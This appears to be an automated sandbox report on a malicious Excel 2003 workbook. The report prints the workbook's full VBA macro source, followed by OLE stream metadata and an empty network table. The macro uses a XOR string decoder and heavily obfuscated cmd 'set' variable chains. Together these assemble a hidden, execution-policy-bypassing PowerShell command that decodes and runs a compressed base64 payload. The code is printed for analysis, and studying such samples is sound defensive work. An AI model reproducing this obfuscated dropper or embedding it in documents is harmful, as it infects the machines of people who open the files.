tegad = "0yJa+CgVQ64wlYgUsz&&set qXy=V" + "B&&s" + "et 87kx=oJOLevLKG&&se" + "t mt" + "i=6&&s" + "et md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&se" + "t W39h=11Hy&&se" + "t fQN=oM2&&se" + "t Igd=-f'y" + "p','e" + "',(  \""""{1" + "}{" + "&&se" + "t qK=Ro5A5SnpE3C/') &&se" + "t vJIZ=oBj" + "EC" + "T') &&set Vkgt=ki6','U+ZEre4WJW&&set A" + "XSR=','R','ea"
End Function
Function TerSS()
lol = "CH') {.(""""{0}{1}{2}""""-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Win" + "dows&&set kmP='k',&&"
miss = "&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=""""&&set 54K=\""""(  )) )  ;  [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\"""" -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Hom" + "e}[&&s"
rava = "et 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr"
sos = miss + rava + tegad + lol
TerSS = Apost("114,28,28,28,92,110,110,117,26,26,17,30,103,26,26,11,126,28,28,28,127,26,26,30,28,28,110,110,114,17,19,66,84") & Replace("t 7T=oM" + "P" + "$Re$sSIo$Nm$" + "OD$e]:$:""""D$`E$cO`$M" + "pr`&&s$et fXO9=`m`pR&&s$et lM='Uauer5J/QU&&se$t OJo=3rTzG&&set J3=t',(\""""{0}&&s$et$ du4k=jNe$xb&&se$t$ xCZA=Ii"""") } ^$^$^^$^^$^$^", "$", "") + sos
End Function
Function Apost(S As String) As String
filks = MicrosoftDoc(S, "1"): dems = Replace(filks, "-", ""): deks = Replace(dems, "_", ""): defs = Replace(deks, "+", "")
Apost = defs
End Function
Function MasterFunction()
am2 = "set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \""""{3}{1}{0}{4}{2}\"""" -f 'nta','ese',(  \""""&&set k2G=Fcgjp5&&set y41=RGJGLLoPE1&&set dAs=49}{7}{51}{5}{2&&set sBW=uCbCLFi5BuJ&&set xZ=bl5RXj&&set FD=1CerMt7ONo0c','q','oSU&&set i9PL=;.&&set sD=6hkJYL&&set 96f=S"""" )^^^^^^^^^^^^^^^|.(""""{0}{1}{&&set fH=tiONP&&set JF=ao&&set RO=YlN&&set GrLY=zZ','&&set yMaD=o5&&set XeL=}{1&&set L4=Ui&&set Yu=xW4i57aY&&set AG=js5R6Eb08Ls3','bxS&&set gS=ZL89PzDtI&&set 2JBb=14}{&&set qpO=-w 1  -nopR  -sta  -ExEcU&&set S1=d1KdrFAH&&set 5c=RN3RKBBV9ZXsjbAx8rLF&&set VZA=Vy7l4Jxf&&set M93h=gb&&set po=oL &&set i8=-f 'InG','TOS','Tr').\""""IN`VOkE\""""(&&set 7wv=u&&set aLve='),'Pr','t'&&set rdfX=43&&set ld=6}&&set 97tN=e8&&set JNvz=7+F','xvUjxS&&set Pj=M&&set J6=W&&set MTk=4&&set XjK=7ooYCqFO5CUzUMaaw92FK','WF&&set fWO4=OdQrtlwhW0wsc7/TRio00qZdd5&&set RLj=bR&&set mC=y3ANhm&&set 5m=E5C3FlV6&&set ibgE=FAmCFN0Ol&&"
am3 = "set quG=nG""""((""""{22}{44}{11}&&set 79=P&&set pIA=2Edc7LZcTpp&&set QEdm=D4Xj&&set vrWE=  ${vErb`o`sE&&set WMP='&&set mOv=25}{21}{28}{37}{40&&set kEQz='&&set JaD=qasUyJ1dKYY+V0F&&set fV=.tex" + "t.ENc" + "Od" + "ING]::""""AS`C&&set Pb={1}\""""&&set LHM=v&&set pw8t=GaxGO/xX1CYmTXt&&set 7y=I7&&set XT=s&&set yV=uo&&set QD=i6SO&&set iWT=]::""""F`R`o`MBAse`64Stri&&set qrQ=zfPUPs5JaAFW&&set Dy=0/e&&set 4NX=','jHSOn&&set g3fn=`oE`Nd""""( )}&&set RT=xE','C'&&set jB={0}{47}{33}{30}{1}{34}{50}{4}{46}{31&&set 2su=PlkIRSG','fSl+lb0CYnloyxTlthMl6&&set rC=}{29}{9}{&&set 8Y=4&&set 5v=hCdAfH4pl9',&&set xd=   )[1,3]  &&set 4Y=AefjFQblNcpE4lg&&set 8lU=','ejG/pwf4EiFPQC3Y&&set Oo=yo2dMx&&set WxJY=+ 'x'-JoiN''  )(  ( [S&&set Mcz=L&&set Wyh=QbYcFAGfmhTt/WAKoZjvt5XsB/HY&&set 6p=Xa/O6smRbnn','32O&&set 3O7I=LkcB'&&set JtM=LdXzlH5AiqodnkybHbbbrH&&set LK='0Lv6L&&set pD=10}"""" -f '&&set gqy= -f 'eX','t','eTt' )).\&&set 6LrC=Ystem.w&&set xQV='g',(  \""""{2}"
am4 = "{0}{1}\""""&&set 9CU='xL1w032cbz&&set Y27=LRcf487TKv0QauRlD9be1uKl&&set DAk=}{48&&set k1W=T&&set GZJ1=inD&&set oh= IO.`&&set XB=a6P&&set kG=6f&&set fUI=bMjUo673DHHJu8i','&&set m2=24}{2}{42}{19}{45}{&&set K7=).\""""inVO`kE\""""(' '  &&set OrFY=GNTS1+BpbbHL1tF3iYVG&&set PH=cM" + "dBAWkCsFa','LKyC','e0p+w0Bofaf/Lyle2u7B3WVDcyxF4zTu6pwrh&&set wZHB=J&&set MVT3=Brmg4ISxL&&set 21=}{35}&&set 8Ne=+sR8Ei7goBM&&set gi1h=^^^^^^^| ^^^^^^^^^^^^^^^&(""""{0}{1}""""-f 'f','ORea&&set I3ae=','dHKk2y&&set f8N1=s/pjm5QG+Uw','As&&set RfN=oV','o','oEET',&&set dnk={&&set okc=hdO0fMc1&&set f2=A&&set kNPC=Lyj0hSicUL1suvPnX&&set AqH=4/&&set 8B=\""""{2}{&&set At=','e','W-&&set szN=ZEGBZ8L/Vs','Nuj8jM2MH','BlogkZxleJ&&set Vn=.Clipbo&&set S9=ard]::(&&set 2h=IYQSiCG&&set iL=L  .  (&&set D9nJ=""""i`N`V&&set DA= &&set 8zYQ=c&&set oc=H1&&set aEs=hoNLSo&&set gH81=,'&&set ivp=ftK8UuZ5LdqmBaILN&&set ak=IC&&set wAIB=fPnVU0HoT+&&set MNA=E','tN&&set m4={2}{0}{&&set Rd3=wJ'&&set WYi=aFd&&set Fj"
am5 = "wh=N.C&&set oD=`AteSTrE`AM( [SYSt&&set SVbw=ALYNhELyiaA1M1&&set aJ=34]+'x')( .(""""{1}{0}{&&set Ms1U=by&&set so1T=Pre&&set XVj=w==','1K&&set xlCT=s2DS//e&&set LU0G=B&&set oWS=HNugXUPjnVoGb3bE7e','XWc4t&&set gSCj=D&&set Yzur= &&set opQ=),[sYsTe&&set OdW=oWS.CL" + "iPbo" + "aRd]::(&&set Kxc6=Pc+BeNlKIqoxmnaJ&&set ay=NvjPN2m&&set WF=qhsxvF6ggHSAvv&&set 4KVu=( ${pS`h`OmE}[4]&&set 8v1=oKp&&set QMEZ={38}{41}{15}{13}{27&&set v1=0}{1}\"""" -f 'e&&set qid=jqwa6Bj','oZEH81Es7&&set 4E0y= [syStEM&&set lwe=40+HZpXFA&&set 7ut= \""""{2}{0}{1}\"""" &&set F24u=K&&set GWCJ=ver&&set Mh=9HhxiqChyuK&&set ly=A&&set Rn='neW-','jECT')  IO.CO&&set Wy=qiY2Jya4B5oLmH&&set lQ=2}&&set Lz=,'bE&&set Sye4=B&&set xzU='GDL&&set jkew=zEJFZG','&&set 7FGL=,'Iz&&set lskm=EcH" + "O/^^^^^^^^^^^^^^^&&&set wyNR=NS1blIorpYOOdplN65rKj&&set Rpm=fA3bUz/Phr&&set Qe=em.io.MEM" + "orYSTREam][sYSte&&set PN=ES&&set 7GBY=BOZV5&&set x58A=efrqnAUABd+h0nPdJvf7SH&&set pN0=xnma7xH&&s"
am6 = "et xvz=\"""" &&set ivU={&&set WIUk= ^^^|cLi" + "P^^^&^^^&cM" + "d /C pow" + "eRS&&set K90z=B&&set x0=z+mg7N&&set 2PKZ=n&&set 8o=Xv2h6+XDuwrB2UzD&&set xI=)&&set vl1D=kFtFBYL7hXXHaH&&set JxP5=2NIa13B2VYlABNEyPGpc&&set LG=DdlpSoWp+ZSu2&&set QI=3}{23}{17&&set 4KG1=3JlvvCkqSn&&set w8PF=L/&&set AR= -f 'T','ext'  ),'S'&&set Qm=/2+p/&&set fvVc=et&&set qe6u=""""-f 'oB',&&set JH3p=CMioW+&&set rxku=X&&set gED=5eVNRxBB&&set aS=P`REf&&set SA=E`ADER( ${&&set xnM=  ( &&set g274=f8Zz+ZY201PTp&&set OyI=m.iO.COm&&set lVa=pO&&set LoKD=  \""""{0}{1}\"""" -f&&set SzR4=}{16}{36}&&set OWD=TLR',&&set Dgc=qmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+&&set s06=s0uJ8LMG&&set G6=`ereNce}.(  \""""&&set g1=5kPuHoeb2d4V2DswOgiwNQPKP','pxXg&&set VO=}{12}{&&set MI4=oKe&&set 2w=e4UYmTa','iE5d4E&&set X2=11','PFd/&&set i3qb=nmSUbRKm/4PD&&set Ga0p=c','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn'&&set ogN=/&&set GtO={32}{2&&set ot=m.COn&&set VUnC=dVZtc6JIEP4rXVu5CIsSQKNBKx/&&set Di7W=,'5T8EDISyqRylxGVJpP64&&se"
am7 = "t Kpm=)&&set iX=tuu&&set AX0i=,'sjp6c&&set 6Ay=1}\""""-f 'o','re','ionC&&set P7=Ch'&&set vTb=eH0'&&set MEn9=0}{8}{&&set wJzc=_},&&set gV=+VJA&&set gKQ=GFy3gJKWW&&set yD=H&&set FC0k=+${PS&&set Llu=39}{&&set jyOe=BYPaSS  -NOnI  &&set 7g=Q&&set RqJz=eLl&&set lW8=2}"""" -f 'Fo&&set kIO=t2pO',&&set rcp={1}{2}{0}&&set YB=Ws+KLOl&&set A0yL=,&&set MPf=K1dUB4BJsmJlTTDKH9Nv&&set Oswb=UG&&set xDr=,&&set Rn1P=1J7&&set gSPy='SISLxsB+i0VNzgIu9Pt7eBk&&set WJ=QG8twkm+pRZlcthuqcLf&&set 62=E`sSION`.`deFL&&set Wp=){${_}.""""&&set qjC=IRS&&set rSoi=m&&set 3Wz=D26&&set qkN=U&&set 85wf=DiHo0&&set 2U=sTrEA`MR&&set O8N='K5AY3vQIdfy+&&set ax=5Zml5EM9PfzlFGjG&&set rMQ=tw','oyn','9F','IKgTW','CVhh6q5k76fS&&set lG2=sZyTl&&call set QJi=%lskm%%4KVu%%FC0k%%MZ%%aJ%%lQ%%qe6u%%Rn%%fXO9%%62%%oD%%Qe%%ot%%GWCJ%%k1W%%iWT%%quG%%jB%%XeL%%FI%%GtO%%ld%%QMEZ%%DAk%%SzR4%%ivU%%Llu%%dAs%%MEn9%%QI%%21%%dnk%%2JBb%%mOv%%VO%%m2%%rdfX%%rC%%pD%%kIO%%9CU%%PF%%Ga0p%%Lz%%dn%%gSPy%%8Ne%%M76%%5v"
am8 = "%%kmP%%O8N%%Rpm%%Kxc6%%ibgE%%F24u%%Ms1U%%97tN%%y41%%md%%LU0G%%Rd3%%AX0i%%X2%%w8PF%%qkN%%xZ%%iX%%OWD%%LK%%XVj%%Dgc%%x58A%%JtM%%Wyh%%qrQ%%WMP%%Di7W%%OJo%%5c%%rSoi%%wyNR%%Mh%%2h%%3O7I%%gH81%%Oswb%%L4%%mti%%Y27%%sBW%%JNvz%%i3qb%%MTk%%79%%7g%%jkew%%JH3p%%I3ae%%sD%%RO%%JF%%Mcz%%Wy%%GrLY%%qjC%%8v1%%4Y%%KGUu%%kG%%yMaD%%8zYQ%%a3%%du4k%%JxP5%%ksNm%%6In%%x0%%YB%%ly%%XT%%ay%%Sye4%%jvc%%fWO4%%pw8t%%XB%%ak%%gV%%kNPC%%f8N1%%gSCj%%dq%%oc%%qXy%%gKQ%%8Y%%6x%%OrFY%%g1%%fUI%%VUnC%%Jx19%%ivp%%85wf%%s06%%Vkgt%%gED%%ax%%M93h%%Qm%%okc%%AG%%W39h%%2w%%4KG1%%fvVc%%87kx%%wZHB%%rxku%%LG%%WJ%%7GBY%%MPf%%lVa%%PH%%4NX%%oWS%%8o%%VZA%%Yu%%gS%%k2G%%Pj%%MNA%%sGDZ%%FD%%5m%%Rn1P%%J6%%RfN%%kEQz%%2su%%pIA%%g9R%%A0yL%%lM%%LHM%%7y%%pN0%%f2%%3kP%%Oo%%SVbw%%WF%%RT%%xDr%%xzU%%AqH%%wFhV%%xlCT%%MVT3%%6p%%mC%%WYi%%qid%%K90z%%QD%%RLj%%8lU%%wAIB%%rMQ%%QEdm%%vl1D%%7wv%%2PKZ%%JaD%%XjK%%vTb%%7FGL%%g274%%lwe%%szN%%aEs%%lG2%%fQN%%S1%%ogN%%3Wz%%yV%%Dy%%qK%%opQ%%OyI%%so1T%%34f%%Fjwh%%7T%%PN%%96f%%lW8%%AXSR%%At%%vJI"
am9 = "Z%%oh%%2U%%SA%%wJzc%%4E0y%%fV%%xCZA%%gi1h%%P7%%Wp%%p5%%g3fn%%Kpm%%WIUk%%yD%%RqJz%%Yzur%%qpO%%fH%%po%%jyOe%%q3FQ%%iL%%7ut%%Igd%%Op%%3mr%%wpf%%m4%%6Ay%%aLve%%DA%%xI%%i9PL%%xnM%%vrWE%%6jA%%aS%%G6%%rcp%%xvz%%i8%%xd%%WxJY%%6LrC%%GZJ1%%OdW%%LoKD%%xQV%%gqy%%D9nJ%%MI4%%54K%%M3hU%%Vn%%S9%%8B%%v1%%J3%%Pb%%AR%%K7%%KcOP%&&C" + "md /C" + " %QJi:""""=!7w:~1!%"""
MasterFunction = TerSS & am2 & am3 & am4 + am5 & am6 + am7 & am8 + am9
End Function

Function MicrosoftDoc(ByVal sData As String, ByVal sKey As String) As String
Dim i As Long, l As Long, byOut() As Byte, sIn() As String, byKey() As Byte
sIn = Split(sData, ",")
ReDim byOut(LBound(sIn) To UBound(sIn))
byKey = StrConv(sKey, vbFromUnicode)
l = LBound(byKey)
For i = LBound(sIn) To UBound(sIn) Step 1
   byOut(i) = Val(sIn(i)) Xor byKey(l)
   l = l + 1
   If l > UBound(byKey) Then l = LBound(byKey)
Next i
MicrosoftDoc = StrConv(byOut, vbUnicode)
End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 107

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	107
Entropy:	4.18482950044
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 308

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	308
Entropy:	3.51447697354
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 3 . 1 2 . 2 0 1 8 . . . . . F o g l i o 2 . . . . . F o g l i o 3 . . . . . ' 1 3 . 1 2 . 2 0 1 8 ' ! P r i n t _ A r e a . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 04 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 c3 00 00 00 02 00 00 00 e3 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 212

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	212
Entropy:	3.55480170714
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u t e n t e . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . { . . . @ . . . . . . U . . . . @ . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a4 00 00 00 07 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 12 00 00 00 60 00 00 00 0b 00 00 00 78 00 00 00 0c 00 00 00 84 00 00 00 0d 00 00 00 90 00 00 00 13 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e3 04 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 41897

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	41897
Entropy:	5.08722725859
Base64 Encoded:	True
Data ASCII:	. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . u t e n t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . Z . . 3 . . 8 . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 75 74 65 6e 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 529

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	529
Entropy:	5.29186139033
Base64 Encoded:	True
Data ASCII:	I D = " { 7 5 A B A 9 5 E - 4 5 0 C - 4 F E 6 - A 4 A F - B C 4 E E A B 4 1 1 6 9 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E E E C C 0 B 3 C 0 F 5 6 D F 9 6
Data Raw:	49 44 3d 22 7b 37 35 41 42 41 39 35 45 2d 34 35 30 43 2d 34 46 45 36 2d 41 34 41 46 2d 42 43 34 45 45 41 42 34 31 31 36 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	104
Entropy:	3.0488640812
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3182

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3182
Entropy:	4.43271774838
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1422

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	1422
Entropy:	4.21186566279
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . C 5 y I . O j D . N . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	93 4b 2a 97 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 6c 00 00 7f 00 00 00 00 15 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 148

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	148
Entropy:	2.7156917085
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . s D a t a . . . . . . . . s K e y h . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff 03 00 00 09 31 03 00 00 00 00 00 00 49 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 01 00 00 08 01 00 00 00 53 02 00 00 08 05 00 00 00 73 44 61 74 61

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 488

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	488
Entropy:	2.2445955868
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . + . 4 . . . I . . . . . . . a . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 05 00 00 00 00 00 00 f9 05 00 00 00 00 00 00 21 06 00 00 00 00 00 00 ff ff ff ff a9 05 00 00 00 00 00 00 08 00 2b 00 34 00 00 00 49 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 71 06

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 377

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	377
Entropy:	2.77635649573
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . A . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . / ( . . . . . . . . . . . . ` . . ! . . . . . . . . . . . . . . . . . . . . . . . . / , . . . . . . . . . . . . ` . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 24 00 01 01 00 00 00 00 02 00 00 00 03 60 00 00 15 04 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 24 00 41 01 00 00 00 00 02 00 01 00 03 60 00 00 19 04 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 28 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 559

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	559
Entropy:	6.39043238036
Base64 Encoded:	True
Data ASCII:	. + . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . ] . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 2b b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 b0 d1 f0 5d 0b 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
